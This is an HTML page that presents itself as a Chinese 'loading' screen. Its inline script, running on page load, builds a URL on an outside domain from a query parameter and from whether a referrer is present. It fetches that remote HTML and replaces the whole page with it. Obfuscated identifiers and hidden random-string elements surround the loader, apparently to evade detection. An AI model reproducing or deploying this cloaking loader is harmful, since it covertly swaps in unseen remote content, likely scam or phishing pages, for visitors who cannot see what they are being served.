<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eTUlKh0jY {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eTUlKh0jY .X7bhIur0 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eTUlKh0jY .content {
            line-height: 50px;
            text-align: center
        }

        .eTUlKh0jY .img {
            width: 100%
        }

        .eTUlKh0jY .ABKr82I7tx5 {
            text-align: center
        }

        .eTUlKh0jY .ABKr82I7tx5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eTUlKh0jY .ABKr82I7tx5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eTUlKh0jY .ABKr82I7tx5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eTUlKh0jY .ABKr82I7tx5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eTUlKh0jY .ABKr82I7tx5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eTUlKh0jY .ABKr82I7tx5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eTUlKh0jY .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NK1QtZMDtl(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wnArtJZ = NK1QtZMDtl('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wnArtJZ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wnArtJZ +".html?a=share";
		}
		
        BoMqW7=url+"#"+new Date().getTime();
        BoMqW7 && function() {
            $.get(BoMqW7, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>bgli2Jo50xtf0C15CIJ0jD</div>
<h1 style='display:none' >NeXptBfknKZukWZy77NSJ1NhDaom7BBvLyXsybmTr</h1>
<p  style='display:none'>TifPXyM09BssZ26jkvB1IwhpmozzoSnSfJvI4hmQObDSPjxg6nnutYKYulUGJXhjQpjmYrMYF</p>
<ul style='display:none' >yyFIyfXhG3QX5UMt9mtM9gKWRCG2YfG3TPR7JlNOuvCi1iYrEfRCTvPl9V37Z9GJXIEHDB9</ul>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>CBKlDtpd6x8x1FvCvxiT7t5l5sjWtIcoby3rqmpwuc2aWAyTcJIEvwUZTCg8uyg19XBrugg0k6MFeNSOzOuQErSp3mr</a><div class="eTUlKh0jY">
    <div class="X7bhIur0">
        <div class="ABKr82I7tx5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>EFwy5zlQZ7oLB3XH1SqpSXkCUqBVOrzMPgVfMHQhoAJ0nI69Y7I1mjkgmaMXxFvucLtMBqUNqU5xUQ6wF3SwyV</div>
<p  style='display:none'>xwkP1wyGFZnbuYdZ07bZYrxeXZKqMVuuTieKULAoi</p>
<p  style='display:none'>xwkP1wyGFZnbuYdZ07bZYrxeXZKqMVuuTieKULAoi</p>
<img  src='' style='display:none'>
<span style='display:none'>phheUW7W079SXndbWIKb1Tl5Q90HGz7tOhw945TF0SMTO5WdU9SgxelGYy861c7qqPk2fEZiiW95LgG</span>
<ul style='display:none' >numyKZkHnqUcS6dlhBTEtlZfaPPQTGlq5oTnB9cOUrDJ7dHdTf61iQbe5lWP</ul>
<img  src='' style='display:none'></body>
</html>